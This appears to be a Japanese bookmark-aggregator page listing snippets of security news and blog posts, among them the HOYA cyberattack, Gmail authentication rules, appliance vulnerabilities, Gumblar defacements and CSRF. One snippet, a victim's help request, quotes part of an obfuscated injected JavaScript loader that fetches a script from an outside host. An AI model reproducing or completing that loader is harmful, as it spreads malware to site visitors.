HOYAがサイバー攻撃で3度目の被害、「犯人」はダークウェブで犯行を公表 | JBpress (ジェイビープレス)
今回は、コンタクトレンズなどを製造販売する光学機器大手HOYAが被害を受けたことが判明した。 「解析には相当の日数を要する見込み」 これを受け、同社は次のような声明を出している。 <2024年3月30日未明、海外の事業所においてシステム挙動に不審な点があったことから調査をしたところ、当社グループの国内外の事業所においてシステム障害が起きていることを確認しました。当社は障害が起きたサーバーの隔離などの対応を直ちに行うとともに関係当局へ報告しました。外部の専門家を交えた調査の結果によれば、本件は第三者による当社サーバーへの不正アクセスに起因する可能性が高いとみられています。 本件により現在、複数の製品について、生産工場内のシステムや受注システムが停止しています。当社では、在庫出荷等の業務については、マニュアルで対応するなど最大限、顧客の需要にお応えするべく務めております。なお、当社が保有する機
Gmailのメール認証規制強化への対応って終わってますか? - エムスリーテックブログ
こんにちは。エムスリー・QLife(エムスリーのグループ会社)・エムスリーヘルスデザイン(エムスリーのグループ会社)でエンジニアとして各種作業に関わっている山本です! 以前もメール送信の話を書かせていただいたことがありますが、今回もまたメールネタとなります。今回のお題はメールセキュリティです。 大量メール送信のための予備知識 - エムスリーテックブログ すでにご覧になった方もいるかと思いますが、次のようなニュースが流れています。 www.proofpoint.com この「GoogleとYahooの新Eメール認証要件」ってつまりどういうことよ? というところを具体的にどのように進めているかについて書かせていただきたいと思います。 2023/12/18追記 : Googleからメール送信にTLSを使うことが追加要件として示されました。 TL;DR とりあえず何から始める? 何はともあれ実際に
スマホを壊してGoogle製二要素認証アプリのバックアップコードが生成不能になったという体験談、バックアップ方法はこれ
ワンタイムパスワードを用いた二要素認証は、ウェブサービス利用時のセキュリティ向上に役立ちます。しかし、Google製ワンタイムパスワード発行アプリ「Google認証システム(Google Authenticator)」の利用者からは「スマートフォンを壊した結果、Google Authenticatorのバックアップコード再発行が不可能になった」という報告が寄せられています。 Tell HN: It is impossible to disable Google 2FA using backup codes | Hacker News https://news.ycombinator.com/item?id=34441697 Google Authenticatorは、各種ウェブサービスにログインするためのワンタイムパスワードを発行するアプリです。例えば、以下はDiscordにログインする際
東京 杉並区職員ら逮捕 住基ネットで閲覧した個人情報漏えいか | NHK
住民基本台帳ネットワークで閲覧した個人情報を外部に漏らしたとして、東京 杉並区の職員など2人が警視庁に逮捕されました。 逮捕されたのは、杉並区の職員、市川直央容疑者(32)と、知人で職業不詳の佐々木洋樹容疑者(34)の2人です。 警視庁によりますと、2人は共謀し、去年4月ごろとことし2月ごろ、杉並区役所にある住民基本台帳ネットワークの端末を操作し、いずれも都外に住む男性と女性の住所などの個人情報を閲覧して外部に漏らしたとして、住民基本台帳法違反の疑いが持たれています。 市川容疑者は当時、区民課の主事で、住基ネットにアクセスできる権限があり、佐々木容疑者から示された人物の情報を閲覧して伝えていたとみられるということです。 ことし2月、区役所への投書がきっかけで区が内部調査を行い、今回の事件が発覚したということです。 警視庁は、端末の検索履歴から、ことし2月までのおよそ1年の間に20人余りの情
三菱の家電に脆弱性 炊飯器、冷蔵庫、エアコン、太陽光発電など広範囲 ユーザー側で対処を
三菱電機は9月29日、炊飯器や冷蔵庫などの家電製品やネットワーク機器などで複数の脆弱性が見つかったと発表した。悪用されるとDoS攻撃を受けた状態になったり、情報漏えいが発生したりする恐れがあるとしている。 【編集履歴:2022年9月30日午後8時 画像内に対象製品ではないものが含まれていたため修正しました】 対象製品は同社製のエアコン、無線LANアダプター、冷蔵庫、給湯器、バス乾燥機、炊飯器、換気システム、スマートスイッチ、太陽光発電システム、IHクッキングヒーターなど。 見つかったのは(1)情報漏えいの脆弱性、(2)DoSの脆弱性、(3)悪意のあるスクリプトを含むメッセージを応答する脆弱性。認証情報が暗号化されず、盗聴により情報を盗まれる恐れもある。 対象製品と対処法一覧(情報漏えいの脆弱性) 対象製品と対処法一覧(DoS、悪意のあるスクリプトを含むメッセージを応答する脆弱性) 三菱電機
Gumblarによる改竄発生中 | 水無月ばけらのえび日記
更新: 2010年1月12日15時35分頃 「GumblarによるWeb改ざん被害が相次ぐ、ユーザーも被害防止対策を (internet.watch.impress.co.jp)」。結構大きな企業のサイトがやられているのが興味深いですね。各社きちんとお知らせを出していますが……。 原因・経緯(12月26日更新) ストリームを担当する制作会社のパソコンが、「Gumblar(ガンブラー)」亜種により、コンピュータウィルスに感染し、パソコンの情報が第三者により盗まれ、対象サイトのファイルが改ざんされました。 以上、Hondaホームページ 「ストリーム」サイトに関する報告とお詫び より 4.原因・経緯 ハウス食品「採用ホームページ」を担当する制作会社のパソコンが、コンピューターウィルス「Gumblar(ガンブラー)亜種」に感染し、パソコンの情報が第三者により盗まれ、対象ページが改ざんされました。
服の下を透視、オランダの空港で検査機使用開始(読売新聞) - Yahoo!ニュース
【ブリュッセル=尾関航也】オランダ内務省は30日、アムステルダム郊外のスキポール空港の保安検査強化策として、衣服の下を透視できる全身スキャナーの使用を開始すると発表した。3週間以内に、米国行き航空機の全搭乗客に対してスキャナーでの検査を行えるようにするという。 同空港発デトロイト行き米ノースウエスト航空機で起きたテロ未遂事件を受けた措置。同空港には、こうした機能を備えた検査機が以前から設置されていたが、搭乗客のプライバシー侵害につながる恐れがあるとして、ほとんど使用されていなかった。 全身スキャナーは、人体とそれ以外の物質を判別でき、金属探知機が反応しない爆薬などの危険物も発見しやすくなるという。 米機テロ未遂事件のナイジェリア人容疑者は、下着の裏に爆発物を仕込んでいたとされる。スキポール空港で航空機を乗り継ぐ際、金属探知機による身体検査と手荷物検査を受けたが、異常は見つからなかった
1週間ほどハッキングに悩まされております。 私の管理するサイト数件がいっせいに被害にあっています。…
1週間ほどハッキングに悩まされております。 私の管理するサイト数件がいっせいに被害にあっています。 WEBサイトに下記のようなコードが埋め込まれるのです(念のため転記は一部)。 <script>/*GNU GPL*/ try{window.onload = function(){var Xi3ref6qv5 = document.createElement('s$^$(c($r)i))^p!^!#t^(!'.replace(/\!|\^|#|@|\)|\(|\$|&/ig, ''));Xi3ref6qv5.setAttribute('type', 'text/javascript');Xi3ref6qv5.setAttribute('src', 'h^$$t$^&t^&$))p$)&:$^)/(^/!^t@i@!s(!(以下略) ネット上で同じような被害が多発している旨見まして、手動でコー
スピンドクターと脆弱性関連情報 | 水無月ばけらのえび日記
公開: 2009年11月10日22時5分頃 読み終わったので。 スピンドクター “モミ消しのプロ”が駆使する「情報操作」の技術 (www.amazon.co.jp)スピン = 情報操作のお話。さまざまな操作の例が紹介されているのですが、興味深いと思ったのは、先に情報を出してニュースとしての価値を低下させてしまうという手法。「しんぶん赤旗」にスクープさせると、他紙が後追い取材をしなくなるとか……。民主党偽メール事件の話も非常に興味深かったですね。 ※個人的に期待していたネット情報操作の話は、最後にちょこっと出ていただけで、ほぼ既知の話でした。そこは少し残念でしたが、他の部分は読み応えがあったかと。 しかし考えてみれば、脆弱性関連の報道やリリースなんてのは「スピン」の典型例でしょうね。 私が発見・報告して報道された事例としては、最近ではサンシャイン牧場、古くはニフティのXSS、JVNアンケート
セブンネットショッピングの「事故」が報じられない理由 - NOW HERE
セブンアンドワイの通販サイトがとんでもないことになってる件。 最初は10月17日から1個あたりの単価で1ケース単位を売っちゃった。 10月17日、イトーヨーカドーのショップサイトでセット商品の価格を単品価格で表記してしまい、誤表記を発見した『2ちゃんねる』ユーザーたちから注文が殺到するという騒動が発生した。『2ちゃんねる』では『イトーヨーカドー祭り』や『イトーヨーカドー誤表記祭り、商品配送ww』というスレッド(掲示板)が作られ、アレもコレもと大量注文されるという事態に発展していったのだ。 イトーヨーカドー価格誤表記で祭り! 2352円を98円で販売! | ガジェット通信 GetNews そして一旦閉鎖、12月8日、リニューアルしてオープンしたら、なんにも直ってないの。 539 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2009/12/08(火) 08:20:52.0
IIS 7.5 详细错误 - 404.0 - Not Found
错误摘要 HTTP 错误 404.0 - Not Found 您要找的资源已被删除、已更名或暂时不可用。
CSRF対策は基本? | 水無月ばけらのえび日記
コミュニティーサイト構築に詳しい専門家は、「CSRF対策は基本的なところ。Amebaなうが対策していなかったのは意外だ」と話している。 「CSRF対策は基本的なところ」と言われると、発見も対処も容易であるような印象を受けますが、これは少し違和感がありますね。 半年ほど前の話ですが、弊社 (www.b-architects.com)のクライアントが新規のECサイトを立ち上げるにあたって脆弱性診断をしようという話になり、外部の会社に見積もり依頼をしたことがあります。その際、業界では知らない人がいないような大手会社の診断メニューも見せていただきました。 そこで印象的だったのは、標準とされるプランにCSRFの診断が含まれていなかったことです。標準のコースにはXSSやSQLインジェクションの診断が含まれますが、CSRFは「アドバンスド」プランの方にしか含まれていませんでした。普通のサイトではXSSや
IIS 7.5 详细错误 - 404.0 - Not Found
错误摘要 HTTP 错误 404.0 - Not Found 您要找的资源已被删除、已更名或暂时不可用。
ホワイトハウス晩餐会に「招かれざる客」
11月27日、ホワイトハウスでの晩餐会に「招かれざる客」の米バージニア州在住の夫婦。オバマ大統領と握手する妻(中央)とその夫(右)と。24日撮影。提供写真(2009年 ロイター/Samantha Appleton-The White House) [ワシントン 27日 ロイター] 米バージニア州在住の夫婦が今週、幾重もの警備をくぐり抜けて、米ホワイトハウスで開催された公式晩餐会の来客を出迎える人の列に加わり、オバマ米大統領など要人に会っていったことが分かった。ホワイトハウスが27日に明らかにした。 ホワイトハウスは大統領警護隊(シークレット・サービス)に全面的な調査を要請。シークレット・サービスは、インドのシン首相夫妻に敬意を表して開かれた晩餐会で起きたセキュリティー違反について、包括的な見直しを行っており、マーク・サリバン・ディレクターは「シークレット・サービスは24日の公式晩餐会をめぐ
インフォメーション | @homepage:@nifty
先日来、お客様のパソコンがウイルスに感染した結果、FTPアカウントとパスワードが盗まれ、お客様が開設したホームページが改ざんされるという事例が多数報告されています。 このように改ざんされたホームページは、ウイルスをダウンロードするよう記述された JavaScript が埋め込まれているため、お客様のホームページを閲覧した他の方にもウイルス感染を広げることになります。 特に今回は、一般的に「GENO ウイルス」と呼ばれる Adobe Reader や Adobe Flash Player の脆弱性を突いた新種のウイルスが感染被害を広げています。 つきましては、お客様において、特に以下の4点にご注意いただきご対策いただきますようお願いいたします。 1.お客様作成の コンテンツに不正な JavaScript が混入されていないかチェックをお願いします。 ※ FTPでアクセスし、ログインした覚えの
ちょっとセキュアな「いつもの」パスワード - ぼくはまちちゃん!
こんにちはこんにちは!! 最近はメールでもなんでもWEB上の便利なサービスが増えてきましたね…! でも、いろいろ登録しすぎて、いよいよぼくもパスワードが管理できなくなってきました…! えっ! もしかして面倒だから、ぜんぶ同じパスワード使ってたりするるんでしょうか…! だめです!だめだめ!それはだめ。 全部のサイトで同じパスワードにするのってものすごく危険ですよ!!! これはほんと! だって、もしなにかあって、どれかひとつのパスワードがばれちゃったら全部芋づるだから…! 登録したWEBサイトの管理者の中に悪い人がいる可能性もあるし。 (個人運営のサイトはもちろん、たとえ大きな企業のサイトでもバイトちゃんが見れたりとか…) でもだからといって全部別のものにすると覚えられないんだよね。 たとえば自分宛にメールしておくとか… Dropboxのような共有フォルダにパスワードのメモいれとくとか… パス
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
中国軍ハッカー侵入、米高官「日本の近代史で最も損害大きい」…浜田防衛相「漏えい確認ない」
ワコム、最大14万7,545名の個人情報が漏洩した可能性。クレジットカード情報も1,938件
asahi.com(朝日新聞社):ヤフー、占いの一部「ガンブラー」被害と発表 - 社会
Twitter / Verified Account